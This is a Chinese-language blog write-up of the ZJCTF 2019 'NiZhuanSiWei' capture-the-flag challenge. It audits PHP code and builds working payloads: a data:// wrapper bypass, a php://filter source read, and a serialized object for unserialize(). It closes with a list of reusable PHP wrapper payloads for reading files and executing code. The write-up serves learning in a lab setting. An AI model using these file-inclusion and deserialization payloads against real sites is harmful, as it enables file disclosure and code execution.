【学习笔记10】buu [ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2024-04-16 11:34:54 发布
最新推荐文章于 2024-04-16 11:34:54 发布
阅读量423 收藏 1
点赞数 2
分类专栏: ctf 学习笔记 文章标签: php python linux java web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107686895
版权

打开一看

<?php  

$text = $_GET["text"];

$file = $_GET["file"];

$password = $_GET["password"];

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){

    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";

    if(preg_match("/flag/",$file)){

        echo "Not now!";

        exit(); 

    }else{

        include($file);  //useless.php

        $password = unserialize($password);

        echo $password;

    }

}

else{

    highlight_file(__FILE__);

}

?>

代码审计走起,一步一步分析,首先是这里

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){

    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";

首先判断text是否传进来,并且传进来的参数是否等于welcome to the zjctf,这时我们就可以利用data伪协议进行文件php文件执行,(data协议通常是用来执行PHP代码,然而我们也可以将内容写入data协议中然后让file_get_contents函数取读取。)

这里就可以构造

?text=data://data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

d2VsY29tZSB0byB0aGUgempjdGY=这时为了绕过一些过滤在这里将传入的值给base64编码了一下

 if(preg_match("/flag/",$file)){

        echo "Not now!";//首先正则匹配一下是否存在flag,如果有就报错退出

        exit(); 

    }else{

        include($file);  //useless.php(这里提示了一个useless.php文件,这里用php://filter读取一下)

        $password = unserialize($password);

        echo $password;

    }

}

因为有过滤不能直接读,那就用base64编译一下构造payload,来看看useless.php里有什么

file=php://filter/read=convert.base64-encode/resource=useless.php//注意于上一传参之间用&链接

得到一串base64编码的代码

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=

解码后得到代码

<?php 

class Flag{  //flag.php  (终于找到关于flag的提示了)

    public $file; 

    public function __tostring(){  //如果这个魔法函数被执行

        if(isset($this->file)){  //就会执行这些

            echo file_get_contents($this->file);

            echo "<br>";

        return ("U R SO CLOSE !///COME ON PLZ");

        } 

    } 

?> 

联想到上边的代码

 $password = unserialize($password);

首先将password的传参序列化一下,之后通过unserialize在反序列化出来,经过flie的传参到uesless.php页面使_tostring执行从而得到flag,下面开始构造序列化的数组

<?php 

class Flag{  //flag.php  (终于找到关于flag的提示了)

    public $file="flag.php"; 

    public function __tostring(){  //如果这个魔法函数被执行

        if(isset($this->file)){  //就会执行这些

            echo file_get_contents($this->file);

            echo "<br>";

        return ("U R SO CLOSE !///COME ON PLZ");

        } 

    } 

}

$a = new Flag();

echo serialize($a);

?> 

把这个在本地执行一下,得到

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} ?>

这里也没有wakeup什么的也就不存在什么绕过,所以直接构造

password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

所以最终的payload就是

?text=data://data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

之后查看源码得到flag

最后补充几个关于伪协议常用的payload,包括读文件和php代码执行

1.?file=data:text/plain,<?php phpinfo()>

2.?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

3.?file=php://input [POST DATA:]

4.?file=php://filter/read=convert.base64-encode/resource=xxx.php

Noslpum
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
lunan的博客
05-15 332
BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议,data://,php:// payload构造: text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造: file=php://filter/read=convert.base64-encode/resource=useless.
[BUUCTF]NiZhuanSiWei (writeup)
weixin_63306244的博客
06-17 322
2、看到了后面双斜杠提示的useless.php,说明flag在useless.php里面。3、看到了useless.php下面的unserialize猜测有反序列化。//用data://传入welcome to the zjctf。//用php://查看useless.php源码。然后现在看到代码里的public更加的确定了想法。就得到了useless.php的源码。有了这个后payload就简单了。进入后看到一串php代码。因为上面有分析到反序列化。随后就是传payload。之后就是构造序列化代码。
[BMZCTF]-simple_pop
cjdgg的博客
05-27 226
[BMZCTF]-simple_pop 题目直接给出了源代码,也比较简单粗暴,绕过两个过滤即可,先看第一个 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the beijing")) 这里我还是第一次见到file_get_contents($text,‘r’)这种用法,也想不出什么绕过方法,就去网上翻一下绕过方法,发现一个利用协议绕过的 确实可以,那这里算是过了,这里过了,接着就到 if(preg_match
buuctf——[ZJCTF 2019]NiZhuanSiWei
m_de_g的博客
04-16 488
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。把整个文件读入一个字符串中。进行抓包传输,开始还一直以为是。方法二需要注意的是,需要使用。的问题,踩了一堆的坑。
[ZJCTF 2019]NiZhuanSiWei
pakho_C的博客
02-08 578
web第23题 [ZJCTF 2019]NiZhuanSiWei 打开靶场: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_cont
POSN:POSN-BUU的源代码
04-01
10. **性能优化**:对于计算密集型的任务,源码可能包含一些性能优化技巧,如循环展开、内联函数、编译器指令等,以提升运行效率。 要深入理解POSN-BUU的具体实现,你需要阅读源代码、了解其设计思路和算法,并结合...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
Python学习手册(第4版)
02-24
很不错的python入门学习书籍,高清带书签。该书2011年出版,python3语法格式,作为编程0基础入门教程很合适,内容很全面
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3288
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
nssctf刷题
weixin_63231007的博客
04-30 1072
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
BUUCTF-NiZhuanSiWei
m0_47571887的博客
11-08 1097
打开题目 第一个if是让我们提交text值,text不为空,并且file_open_concents的返回值为'welcometothezjctf',但这text是个变量,这里就需要用到php://input协议,以POST方式提交'welcometothezjctf'。 第二个if是过滤了flag,如果检测flag,则返回"Not now",这里还发现了一个文件包含。 先将useless.php拖拽下来。 ?text=php://input&file=php://fil...
BUUCTF刷题记录 NiZhuanSiWei
m0_46576074的博客
05-18 414
[ZJCTF 2019]NiZhuanSiWei 进入网址 源码分析 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")) 用data伪协议传参 ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 源码分析 if(preg_match("/flag/",$file)){ echo "Not now!";
第二十四题——[ZJCTF 2019]NiZhuanSiWei
分享简单的安全技术
04-15 405
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,展示了php代码 第二步:使用data协议绕过text参数检测 经过代码分析,text参数不能为空,且根据text参数所指定的文件名字读取出来与字符串welcome to the zjctf进行比较。 使用data协议进行绕过文件读取,将welcome to the zjctf进行64编码后得到:d2VsY29tZSB0byB0aGUgempjdGY=,传入参数text=data://text/plain;ba
BUUCTF [web专项24][ZJCTF 2019]NiZhuanSiWei
yanglinchiji的博客
11-06 94
注意:一定不要再用伪协议获得useless.php的base64编码内容了,而且还要指明文件是useless.php,否则会被顶掉内容。将其修改变量file后并添加输出后,进行序列化操作,再传输给password让其输出。还记得前面的截图吗,在后面会有一个反序列化操作,那么我们就可以利用该代码。获取结果后,将其传给password。3.这道题是有序列化和反序列化的。出现base64码,解码后,得到。1.需要给text传输一句话。进行正则匹配,禁止出现flag。接下来,尝试伪协议查看。参考他人wp后,发现。
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化与反序列化)
m0_55854679的博客
08-23 1957
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值